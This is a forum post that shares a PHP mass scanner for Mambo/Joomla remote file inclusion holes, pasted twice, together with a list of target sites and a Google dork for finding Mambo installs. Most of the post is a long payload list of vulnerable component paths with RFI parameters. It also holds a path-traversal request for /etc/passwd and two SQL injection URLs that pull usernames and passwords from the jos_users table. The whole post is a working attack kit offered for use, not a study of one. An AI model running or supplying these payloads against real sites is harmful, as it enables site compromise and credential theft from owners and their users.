Autor
Código:
<?php
/*
PHP Mass Mambo/Joomla RFI Scanner version 1.5 - 26/04/2007
Priv8 Tool for all RS mambers.
Written by R00T[ATI] && Minus. hvc88[at]hotmail.com
Modify by haldir SPAM(64)
*/
if ($argc<4) {
echo"\nUsage: php mass_scan.php targets.txt output.txt list.txt\n";
die;
}
$targetsi = $argv[1];
$outputi = $argv[2];
$lista = $argv[3];
if(!$targets=fopen($targetsi,"r"))
{
echo "Error reading input sites file\n";
exit;
}
if(!$list=fopen($lista,"r"))
{
echo "Error reading rfi file\n";
exit;
}
/* For not replace eventual output files Minus plugged-in this code */
if (file_exists($outputi)) {
$outputi = "$outputi.2";
}
if (file_exists("$outputi".".1")) {
$outputi = "$outputi.2";
}
/* End of Minus add-on */
if(!$output=fopen($outputi,"w"))
{
echo "Error writing in output file\n";
exit;
}
ini_set('max_execution_time', 999999999);
while(!feof($targets)) /* First cicle of targets list */
{
$target_h = (fgets($targets));
fclose($list); /* Closing RFI and LFI file */
$list=fopen($lista,"r"); /* Reopening RFI and LFI file for restart the pointer at the first line */
/* 200 control code. */
$site = trim($target_h)."/inexisting_file_for_200_checking.php3";
echo "\n\n$site";
$file = @fopen($site, 'r');
if ($file)
{
echo " - Probably invalid 200 replay :( Creating probably_sites.txt\n\n";
$not_regular_200 = true; /* If site replay with 200 boolean flag will be set to TRUE */
if(!$probably_200=fopen("probably_sites.txt","w"))
{
echo "Error writing probably_200 file\n"; /* Creating probably.txt file */
exit;
}
}
else
{
echo " - Right 404 replay! ;)\n";
}
/* End 200 control code. */
do { /* Opening second cicle for RFI and LFI file */
$list_h = (fgets($list));
$site = trim($target_h).trim($list_h); /* trim for delete the spaces */
echo $site;
$file = @fopen($site, 'r'); /* Rudimental HTTP replay grabber XD */
if ($file)
{
echo " - 200\n";
if ($not_regular_200)
{
fputs($probably_200 ,"$site
"."\n");
}
else
{
fputs($output ,"$site
"."\n"); /* Write in output file */
}
}
else /* If site replay with 404 */
{
echo " - 404\n"; /* 404??? Maybe also 403 or 500 */
}
} while(!feof($list)); /* Closing RFI and LFI file */
$not_regular_200 = false; /* Resetting boolean flag to false */
} /* Closing first cicle of targets list */
fclose($list);
fclose($targets);
fclose($output);
if(!$probably_200)
{
fclose($probably_200);
}
?>
/*
PHP Mass Mambo/Joomla RFI Scanner version 1.5 - 26/04/2007
Priv8 Tool for all RS mambers.
Written by R00T[ATI] && Minus. hvc88[at]hotmail.com
Modify by haldir SPAM(64)
*/
if ($argc<4) {
echo"\nUsage: php mass_scan.php targets.txt output.txt list.txt\n";
die;
}
$targetsi = $argv[1];
$outputi = $argv[2];
$lista = $argv[3];
if(!$targets=fopen($targetsi,"r"))
{
echo "Error reading input sites file\n";
exit;
}
if(!$list=fopen($lista,"r"))
{
echo "Error reading rfi file\n";
exit;
}
/* For not replace eventual output files Minus plugged-in this code */
if (file_exists($outputi)) {
$outputi = "$outputi.2";
}
if (file_exists("$outputi".".1")) {
$outputi = "$outputi.2";
}
/* End of Minus add-on */
if(!$output=fopen($outputi,"w"))
{
echo "Error writing in output file\n";
exit;
}
ini_set('max_execution_time', 999999999);
while(!feof($targets)) /* First cicle of targets list */
{
$target_h = (fgets($targets));
fclose($list); /* Closing RFI and LFI file */
$list=fopen($lista,"r"); /* Reopening RFI and LFI file for restart the pointer at the first line */
/* 200 control code. */
$site = trim($target_h)."/inexisting_file_for_200_checking.php3";
echo "\n\n$site";
$file = @fopen($site, 'r');
if ($file)
{
echo " - Probably invalid 200 replay :( Creating probably_sites.txt\n\n";
$not_regular_200 = true; /* If site replay with 200 boolean flag will be set to TRUE */
if(!$probably_200=fopen("probably_sites.txt","w"))
{
echo "Error writing probably_200 file\n"; /* Creating probably.txt file */
exit;
}
}
else
{
echo " - Right 404 replay! ;)\n";
}
/* End 200 control code. */
do { /* Opening second cicle for RFI and LFI file */
$list_h = (fgets($list));
$site = trim($target_h).trim($list_h); /* trim for delete the spaces */
echo $site;
$file = @fopen($site, 'r'); /* Rudimental HTTP replay grabber XD */
if ($file)
{
echo " - 200\n";
if ($not_regular_200)
{
fputs($probably_200 ,"$site
"."\n");
}
else
{
fputs($output ,"$site
"."\n"); /* Write in output file */
}
}
else /* If site replay with 404 */
{
echo " - 404\n"; /* 404??? Maybe also 403 or 500 */
}
} while(!feof($list)); /* Closing RFI and LFI file */
$not_regular_200 = false; /* Resetting boolean flag to false */
} /* Closing first cicle of targets list */
fclose($list);
fclose($targets);
fclose($output);
if(!$probably_200)
{
fclose($probably_200);
}
?>
[COLOR="Red"]TARGETS.TXT[/COLOR]
Código:
http://www.warnews.it
http://maswebs.com
http://maswebs.com
[COLOR="Red"]LIST.TXT (Updated to 24/12/2007) [/COLOR]
Código:
/index.php
/components/com_flyspray/startdown.php?file=../../../../../etc/passwd%00
/templates/be2004-2/index.php?mosConfig_absolute_path=
/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=
libraries/pcl/pcltar.php?g_pcltar_lib_dir=
/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=
/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=
/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
/components/com_mambowiki/MamboLogin.php?IP=
/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=
/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=
/components/com_cpg/cpg.php?mosConfig_absolute_path=
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
/components/com_moodle/moodle.php?mosConfig_absolute_path=
/components/com_mospray/scripts/admin.php?basedir=
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
/components/com_hashcash/server.php?mosConfig_absolute_path=
/components/com_minibb.php?absolute_path=
/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=
/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=
/components/calendar/com_calendar.php?absolute_path=
/modules/calendar/mod_calendar.php?absolute_path=
/components/com_calendar.php?absolute_path=
/modules/mod_calendar.php?absolute_path=
/modules/mod_weather.php?absolute_path=
/components/minibb/index.php?absolute_path=
/components/com_performs/performs.php?mosConfig_absolute_path=
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
/components/com_smf/smf.php?mosConfig_absolute_path=
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
/components/com_forum/download.php?phpbb_root_path=
/components/com_simpleboard/image_upload.php?sbp=
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
/includes/functions_cms.php?phpbb_root_path=
/includes/adminAvatars.php?GlobalSettings[templatesDirectory]=
/includes/adminSmileys.php?GlobalSettings[templatesDirectory]=
/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=
/modules/mod_as_category.php?mosConfig_absolute_path=
/includes/move.php?GlobalSettings[templatesDirectory]=
/mod_cbsms_messages.php?mosConfig_absolute_path=
/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=
/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=
/component/com_events/includes/comutils.php?mosConfig_absolute_path=
/administrator/components/com_expose/uploadimg.php
/modules/mod_header_image.php?mosConfig_absolute_path=
/index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=%20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,5,username,char(32,112,97,115,115,119,111,114,100,5,password),5,0,0%20from%20jos_users/*
/index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=
/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=
/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=
/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=
/components/com_mp3_allopass/allopass.php?mosConfig_live_site=
/components/com_jcs/jcs.function.php?mosConfig_absolute_path=
/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=
/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=
/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=
/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=
/administrator/components/com_color/admin.color.php?mosConfig_live_site=
/components/com_flyspray/startdown.php?file=../../../../../etc/passwd%00
/templates/be2004-2/index.php?mosConfig_absolute_path=
/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=
libraries/pcl/pcltar.php?g_pcltar_lib_dir=
/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=
/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=
/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
/components/com_mambowiki/MamboLogin.php?IP=
/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=
/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=
/components/com_cpg/cpg.php?mosConfig_absolute_path=
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
/components/com_moodle/moodle.php?mosConfig_absolute_path=
/components/com_mospray/scripts/admin.php?basedir=
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
/components/com_hashcash/server.php?mosConfig_absolute_path=
/components/com_minibb.php?absolute_path=
/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=
/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=
/components/calendar/com_calendar.php?absolute_path=
/modules/calendar/mod_calendar.php?absolute_path=
/components/com_calendar.php?absolute_path=
/modules/mod_calendar.php?absolute_path=
/modules/mod_weather.php?absolute_path=
/components/minibb/index.php?absolute_path=
/components/com_performs/performs.php?mosConfig_absolute_path=
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
/components/com_smf/smf.php?mosConfig_absolute_path=
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
/components/com_forum/download.php?phpbb_root_path=
/components/com_simpleboard/image_upload.php?sbp=
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
/includes/functions_cms.php?phpbb_root_path=
/includes/adminAvatars.php?GlobalSettings[templatesDirectory]=
/includes/adminSmileys.php?GlobalSettings[templatesDirectory]=
/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=
/modules/mod_as_category.php?mosConfig_absolute_path=
/includes/move.php?GlobalSettings[templatesDirectory]=
/mod_cbsms_messages.php?mosConfig_absolute_path=
/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=
/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=
/component/com_events/includes/comutils.php?mosConfig_absolute_path=
/administrator/components/com_expose/uploadimg.php
/modules/mod_header_image.php?mosConfig_absolute_path=
/index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=%20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,5,username,char(32,112,97,115,115,119,111,114,100,5,password),5,0,0%20from%20jos_users/*
/index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=
/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=
/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=
/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=
/components/com_mp3_allopass/allopass.php?mosConfig_live_site=
/components/com_jcs/jcs.function.php?mosConfig_absolute_path=
/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=
/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=
/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=
/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=
/administrator/components/com_color/admin.color.php?mosConfig_live_site=
[COLOR="red"]DORK[/COLOR]
Código:
"powered by mambo" | inurl:"index2.php" | inurl:"administrator/index.php"
En línea
.
